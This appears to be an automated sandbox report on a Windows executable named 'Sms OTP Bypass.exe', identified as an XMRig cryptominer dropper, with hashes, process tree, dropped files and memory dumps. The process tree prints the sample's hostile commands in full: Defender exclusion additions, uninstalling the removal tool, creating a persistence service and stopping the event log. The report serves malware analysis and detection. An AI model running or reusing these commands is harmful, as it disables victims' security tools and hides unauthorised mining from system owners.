Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/03/2024, 19:01

General

  • Target

    Sms OTP Bypass.exe

  • Size

    7.0MB

  • MD5

    4df295e5480362e75b85e46693da286f

  • SHA1

    e791d85958043807505d6d515352884513d8d8dd

  • SHA256

    39899e500bdfd7374f1e70fbfac44d6426e7b4eb4970c3ff49a3515f76e13728

  • SHA512

    97e2add3ea23a8196eff5ed50bc08a4e50a48d2629c8f64afe19a0280adb947a2287735ecc4c32b59d7b1722a530120cf310fdecc4d89671843a3318128983f3

  • SSDEEP

    196608:vPMf4f+QSvWLEesxAv12VI4yBj5w6C/1/pejflOy+:n4oRvLNsC1c8jKJejfd

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Creates new service(s) 1 TTPs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Sms OTP Bypass.exe
    "C:\Users\Admin\AppData\Local\Temp\Sms OTP Bypass.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAbQB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAawBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYgBuACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1408
    • C:\Users\Admin\AppData\Local\Temp\xax.exe
      "C:\Users\Admin\AppData\Local\Temp\xax.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      PID:5076
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4072
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
            PID:5112
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe delete "QKSKJKRJ"
          3⤵
          • Launches sc.exe
          PID:3764
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe create "QKSKJKRJ" binpath= "C:\ProgramData\dxsbfkaweyrd\jjqyznjsierq.exe" start= "auto"
          3⤵
          • Launches sc.exe
          PID:1944
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop eventlog
          3⤵
          • Launches sc.exe
          PID:3068
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe start "QKSKJKRJ"
          3⤵
          • Launches sc.exe
          PID:4936
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:4712
      • C:\ProgramData\dxsbfkaweyrd\jjqyznjsierq.exe
        C:\ProgramData\dxsbfkaweyrd\jjqyznjsierq.exe
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4988
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4420
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2344
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            3⤵
              PID:5080
          • C:\Windows\system32\conhost.exe
            C:\Windows\system32\conhost.exe
            2⤵
              PID:3060
            • C:\Windows\explorer.exe
              explorer.exe
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4068

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\dxsbfkaweyrd\jjqyznjsierq.exe

                  Filesize

                  2.2MB

                  MD5

                  339d06428da6646f3a82c2f83d78a1d1

                  SHA1

                  97adad7f8f098f350b747bc49899ffd1882d1fe2

                  SHA256

                  65ad8d5f0c1416faeb76592fa79a78ea16e4e2e3e3b0cd4bbb66f70f27b2f525

                  SHA512

                  1944be601e3cfad7b2a218c029d1043a8a3df4dc64fa62d9407bb0bbf67a5dcd33b541c7f698e846ee105905c8625886559247aeb4b3770161436fa30f82ecf1

                • C:\ProgramData\dxsbfkaweyrd\jjqyznjsierq.exe

                  Filesize

                  2.1MB

                  MD5

                  09580b30a73902b7e4d78d376c2590da

                  SHA1

                  3f4a113ba7229f97e825dda2b7f1387dff021cfa

                  SHA256

                  57c2cb7fb9a946ae0e3c2a2bdad0deabe5f49b926eec3128b66b5403fcb67442

                  SHA512

                  3426b37dadd5b40425824865f3eca308c283cb13c8468628b50f3c855fd4f2b567368f50bd47430afcd3e20f1df7f023d72bc067c2d13e2b113d516dbeb4768f

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  18KB

                  MD5

                  6f917b81638859a0237a5c7efd5822dd

                  SHA1

                  c5ac2b6f86b6ed8665a69a2deb0175f9b1723727

                  SHA256

                  ff7b41bb04706ddb3394619200e11bba4e2318af9ac0bbbcf160d8294e027bde

                  SHA512

                  f977b6885fd80e3ef07e689c2991c66a01d044ac1dbebf585e50e73530addc6e8de717d9171fa8520ed992ed4637ddd04c03de89c123d16c38ec9b86f6215aef

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mvkoezsk.t5j.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\xax.exe

                  Filesize

                  2.5MB

                  MD5

                  2b7e16b135c4e44b6f00d70f73fca100

                  SHA1

                  cd633d7f72310b2ce1b44b000d5e7cb1cdf593d4

                  SHA256

                  d8dea37f8bf774429f9f1a3e815ab1970c3642589c18a2683f4b6469755e07cb

                  SHA512

                  590f01eaa1e9402a7da761a44f699ca535b204b777c329ae300777c7fb8476f52f8e71512699e13241376144a67d634bd194c174f577481f5bd75e9dc17c2dde

                • memory/1408-43-0x0000000007260000-0x0000000007303000-memory.dmp

                  Filesize

                  652KB

                • memory/1408-42-0x0000000000F00000-0x0000000000F10000-memory.dmp

                  Filesize

                  64KB

                • memory/1408-21-0x0000000005A00000-0x0000000005A66000-memory.dmp

                  Filesize

                  408KB

                • memory/1408-17-0x0000000005990000-0x00000000059F6000-memory.dmp

                  Filesize

                  408KB

                • memory/1408-26-0x0000000005D00000-0x0000000006054000-memory.dmp

                  Filesize

                  3.3MB

                • memory/1408-27-0x0000000006060000-0x000000000607E000-memory.dmp

                  Filesize

                  120KB

                • memory/1408-28-0x0000000006080000-0x00000000060CC000-memory.dmp

                  Filesize

                  304KB

                • memory/1408-29-0x000000007FDA0000-0x000000007FDB0000-memory.dmp

                  Filesize

                  64KB

                • memory/1408-30-0x0000000007020000-0x0000000007052000-memory.dmp

                  Filesize

                  200KB

                • memory/1408-31-0x0000000072070000-0x00000000720BC000-memory.dmp

                  Filesize

                  304KB

                • memory/1408-41-0x0000000006640000-0x000000000665E000-memory.dmp

                  Filesize

                  120KB

                • memory/1408-13-0x00000000051C0000-0x00000000057E8000-memory.dmp

                  Filesize

                  6.2MB

                • memory/1408-44-0x0000000000F00000-0x0000000000F10000-memory.dmp

                  Filesize

                  64KB

                • memory/1408-14-0x00000000058F0000-0x0000000005912000-memory.dmp

                  Filesize

                  136KB

                • memory/1408-45-0x00000000079D0000-0x000000000804A000-memory.dmp

                  Filesize

                  6.5MB

                • memory/1408-46-0x0000000007390000-0x00000000073AA000-memory.dmp

                  Filesize

                  104KB

                • memory/1408-47-0x0000000007400000-0x000000000740A000-memory.dmp

                  Filesize

                  40KB

                • memory/1408-48-0x0000000007620000-0x00000000076B6000-memory.dmp

                  Filesize

                  600KB

                • memory/1408-49-0x0000000007590000-0x00000000075A1000-memory.dmp

                  Filesize

                  68KB

                • memory/1408-50-0x00000000075D0000-0x00000000075DE000-memory.dmp

                  Filesize

                  56KB

                • memory/1408-51-0x00000000075E0000-0x00000000075F4000-memory.dmp

                  Filesize

                  80KB

                • memory/1408-52-0x00000000076C0000-0x00000000076DA000-memory.dmp

                  Filesize

                  104KB

                • memory/1408-53-0x0000000007610000-0x0000000007618000-memory.dmp

                  Filesize

                  32KB

                • memory/1408-56-0x00000000735A0000-0x0000000073D50000-memory.dmp

                  Filesize

                  7.7MB

                • memory/1408-12-0x0000000000F00000-0x0000000000F10000-memory.dmp

                  Filesize

                  64KB

                • memory/1408-11-0x00000000735A0000-0x0000000073D50000-memory.dmp

                  Filesize

                  7.7MB

                • memory/1408-9-0x0000000000F10000-0x0000000000F46000-memory.dmp

                  Filesize

                  216KB

                • memory/3060-119-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3060-112-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3060-116-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3060-115-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3060-114-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3060-113-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/4068-125-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-120-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-137-0x0000000001BB0000-0x0000000001BD0000-memory.dmp

                  Filesize

                  128KB

                • memory/4068-136-0x0000000001BB0000-0x0000000001BD0000-memory.dmp

                  Filesize

                  128KB

                • memory/4068-135-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-134-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-133-0x0000000001B90000-0x0000000001BB0000-memory.dmp

                  Filesize

                  128KB

                • memory/4068-132-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-131-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-130-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-129-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-128-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-127-0x0000000001180000-0x00000000011A0000-memory.dmp

                  Filesize

                  128KB

                • memory/4068-126-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-124-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-123-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-122-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4068-121-0x0000000140000000-0x0000000140848000-memory.dmp

                  Filesize

                  8.3MB

                • memory/4072-57-0x000002365C530000-0x000002365C552000-memory.dmp

                  Filesize

                  136KB

                • memory/4072-72-0x00007FFB63560000-0x00007FFB64021000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4072-68-0x00000236424B0000-0x00000236424C0000-memory.dmp

                  Filesize

                  64KB

                • memory/4072-63-0x00007FFB63560000-0x00007FFB64021000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4420-108-0x000002777A4C0000-0x000002777A4D0000-memory.dmp

                  Filesize

                  64KB

                • memory/4420-106-0x000002777AC60000-0x000002777AC66000-memory.dmp

                  Filesize

                  24KB

                • memory/4420-76-0x00007FFB63560000-0x00007FFB64021000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4420-77-0x000002777A4C0000-0x000002777A4D0000-memory.dmp

                  Filesize

                  64KB

                • memory/4420-111-0x00007FFB63560000-0x00007FFB64021000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4420-98-0x00007FF4BF260000-0x00007FF4BF270000-memory.dmp

                  Filesize

                  64KB

                • memory/4420-107-0x000002777AC70000-0x000002777AC7A000-memory.dmp

                  Filesize

                  40KB

                • memory/4420-78-0x000002777A4C0000-0x000002777A4D0000-memory.dmp

                  Filesize

                  64KB

                • memory/4420-105-0x000002777A4B0000-0x000002777A4B8000-memory.dmp

                  Filesize

                  32KB

                • memory/4420-104-0x000002777AC80000-0x000002777AC9A000-memory.dmp

                  Filesize

                  104KB

                • memory/4420-103-0x000002777A4A0000-0x000002777A4AA000-memory.dmp

                  Filesize

                  40KB

                • memory/4420-102-0x000002777AC40000-0x000002777AC5C000-memory.dmp

                  Filesize

                  112KB

                • memory/4420-101-0x000002777A490000-0x000002777A49A000-memory.dmp

                  Filesize

                  40KB

                • memory/4420-99-0x000002777A4C0000-0x000002777A4D0000-memory.dmp

                  Filesize

                  64KB

                • memory/4420-100-0x000002777AA40000-0x000002777AAF5000-memory.dmp

                  Filesize

                  724KB

                • memory/4420-97-0x000002777A470000-0x000002777A48C000-memory.dmp

                  Filesize

                  112KB